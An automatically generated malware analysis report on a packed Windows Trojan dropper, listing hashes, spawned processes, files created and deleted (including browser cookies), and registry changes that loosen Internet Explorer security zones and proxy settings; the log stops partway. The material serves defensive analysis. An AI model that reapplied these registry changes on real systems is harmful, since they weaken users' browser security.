HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Trojan.Heur.Dropper.hmGfamxW9Ncb (B) (Emsisoft), Gen:Trojan.Heur.Dropper.hmGfamxW9Ncb (AdAware), Trojan.Win32.Swrort.3.FD, PUPHomePages.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan, PUP
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 01a6ec54d2ba5e3611ef733ea2747189
SHA1: 2b9e5534a15de090d0e42a199048facac2887052
SHA256: 8eace449341619f902191cdc9dec971c6b3164c8a992b188152062fc0669fc98
SSDeep: 3072:rpdtP1lmEyLL6iAlpJEdULhfTRJ0mNZyV29kxFwsvDctoutU:r9Xm365lpKQB1JjHyV290FwsrctoSU
Size: 117248 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2013-02-28 06:07:37
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
regsvr32.exe:1760
regsvr32.exe:2020
regsvr32.exe:1412
sc.exe:1164
sc.exe:896
The Trojan injects its code into the following process(es):
%original file name%.exe:516
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~2662TXStartUpdateLog.tmp (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\homepro[1].txt (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmpbak (11299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFIC4966.tmp (11385 bytes)
%WinDir%\system\lock.dat (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\exitpop[1].txt (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\remote.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\insert.tmp (2490 bytes)
%WinDir%\win.ini (4626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\newDomain[1].txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBIC753.TMP (17716 bytes)
%WinDir%\lock.log (914 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yxjpq.tmp (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DFA2796.tmp (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\InsertWnd[1].txt (671 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\InsertWnd_enlc[1].dll (19378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\safeen[1].txt (670 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\pubjc[1].txt (21084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA90A3.TMP (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\osm[1].dll (11953 bytes)
%Documents and Settings%\%current user%\Application Data\8901.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\newcor[1].dll (34450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\yxjpq[1].txt (588 bytes)
%System%\lockie.ini (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prosafe.tmp (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA3334.tmp (3383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC626.tmp (8314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jslist.tmp (692 bytes)
%System%\mswinsck.ocx (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~prohome.tmp (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xsend.tmp (37241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (6262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcsaVas32.tmp (58 bytes)
%WinDir%\sys.dat (7212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\jzjc[1].txt (154 bytes)
%System%\gdi30.dll (112 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jslist[1].txt (1405 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tcjk.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\file[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA8273.tmp (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFB3931.tmp (4418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~url.tmp (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\domain.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ic[1].htm (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmp (47412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzjc.tmp (154 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\jzurl[1].txt (1224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (294 bytes)
%System%\drivers\etc\hosts.tmp (2822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\tfgg[1].txt (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\icdata[1].dll (18063 bytes)
%WinDir%\xdrq\lockie.ini (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\eb[1].txt (1721 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (19996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\InsertWnd_2345title_en[1].dll (16223 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\taian[1].ini (1006 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DUs6109.tmp (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\serList[1].txt (1521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\prosafe[1].txt (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eb.tmp (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\serList.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA6871.tmp (11948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzurl.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\urlRemote[1].txt (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4990.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcVas32.tmp (388 bytes)
%WinDir%\Media\ad.ini (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC263.TMP (16428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jzyxj[1].txt (1824 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~2662TXStartUpdateLog.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ssl.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@money.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcVas32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~prohome.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC626.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcsaVas32.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msnportal.112.2o7[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\remote.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmpbak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eb.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@auto.search.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hit.gemius[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jslist.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.bing[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@pass.yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky.122.2o7[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\8901.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFB3931.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~url.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\domain.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzjc.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prosafe.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (0 bytes)
%System%\drivers\etc\hosts.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[3].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFIC4966.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yxjpq.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tcjk.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\taian[1].ini (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\serList.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzurl.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4990.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%WinDir%\Media\ad.ini (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jzyxj[1].txt (0 bytes)
Registry activity
The process regsvr32.exe:1760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\MSWinsock.Winsock]
"(Default)" = "Microsoft WinSock Control, version 6.0"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32]
"(Default)" = "%System%\mswinsck.ocx, 1"
[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32]
"(Default)" = "%System%\mswinsck.ocx"
[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\1]
"(Default)" = "132497"
[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "IMSWinsockControl"
[HKCR\MSWinsock.Winsock\CLSID]
"(Default)" = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"
[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "Winsock General Property Page Object"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InProcServer32]
"(Default)" = "%System%\mswinsck.ocx"
[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"(Default)" = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\win32]
"(Default)" = "%System%\mswinsck.ocx"
[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "DMSWinsockControlEvents"
[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID]
"(Default)" = "MSWinsock.Winsock"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InProcServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"Version" = "1.0"
"(Default)" = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID]
"(Default)" = "MSWinsock.Winsock.1"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "Microsoft WinSock Control, version 6.0"
[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0]
"(Default)" = "Microsoft Winsock Control 6.0"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version]
"(Default)" = "1.0"
[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\FLAGS]
"(Default)" = "2"
[HKCR\MSWinsock.Winsock\CurVer]
"(Default)" = "MSWinsock.Winsock.1"
[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E E2 FC 3D B1 95 0B 9F F5 86 FB 43 AB 39 18 38"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus]
"(Default)" = "0"
[HKCR\MSWinsock.Winsock.1\CLSID]
"(Default)" = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"
[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR]
"(Default)" = ""
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"(Default)" = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
[HKCR\MSWinsock.Winsock.1]
"(Default)" = "Microsoft WinSock Control, version 6.0"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}]
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}]
The Trojan deletes the following value(s) in system registry:
[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32]
"ThreadingModel"
The process regsvr32.exe:2020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 12 AF FC 0C 86 99 69 34 4E 30 8D EB 42 B6 C3"
[HKCR\Es58.P2P\Clsid]
"(Default)" = "{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}"
[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0]
"(Default)" = "Es58"
[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA8273.tmp"
[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\TypeLib]
"(Default)" = "{52DAF8C9-8861-47A8-BC17-077666A2342A}"
[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\TypeLib]
"Version" = "1.0"
[HKCR\Es58.P2P]
"(Default)" = "Es58.P2P"
[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\TypeLib]
"(Default)" = "{52DAF8C9-8861-47A8-BC17-077666A2342A}"
[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}]
"(Default)" = "_P2P"
[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}]
"(Default)" = "Es58.P2P"
[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\VERSION]
"(Default)" = "1.0"
[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\ProgID]
"(Default)" = "Es58.P2P"
[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA8273.tmp"
[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
The process regsvr32.exe:1412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\InprocServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA6871.tmp"
[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}\TypeLib]
"Version" = "4f4.0"
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"
[HKCR\yswm.FileIO\Clsid]
"(Default)" = "{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}"
[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\TypeLib]
"Version" = "4f4.0"
[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA6871.tmp"
[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\VERSION]
"(Default)" = "1268.0"
[HKCR\yswm.FileIO]
"(Default)" = "yswm.FileIO"
[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\TypeLib]
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"
[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}]
"(Default)" = "yswm.FileIO"
[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}]
"(Default)" = "_FileIO"
[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\VERSION]
"(Default)" = "1268.0"
[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}]
"(Default)" = "_runsoft"
[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\yswm.runsoft]
"(Default)" = "yswm.runsoft"
[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0]
"(Default)" = "yswm"
[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\TypeLib]
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"
[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\InprocServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA6871.tmp"
[HKCR\yswm.runsoft\Clsid]
"(Default)" = "{B007063B-34E1-4EA4-BC29-11D1AE806386}"
[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\TypeLib]
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"
[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}]
"(Default)" = "yswm.runsoft"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 FF 4A 2F CB 67 23 3E 5B 37 7D E8 C4 22 48 2B"
[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\ProgID]
"(Default)" = "yswm.FileIO"
[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\ProgID]
"(Default)" = "yswm.runsoft"
The process %original file name%.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 E4 2B F3 D7 BE 4E D5 CF B3 F8 F6 17 72 A4 D7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sc.exe:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 BA CA A3 C6 4F D5 87 EF 3F 05 22 35 DB EB C4"
The process sc.exe:896 makes changes in the system registry.
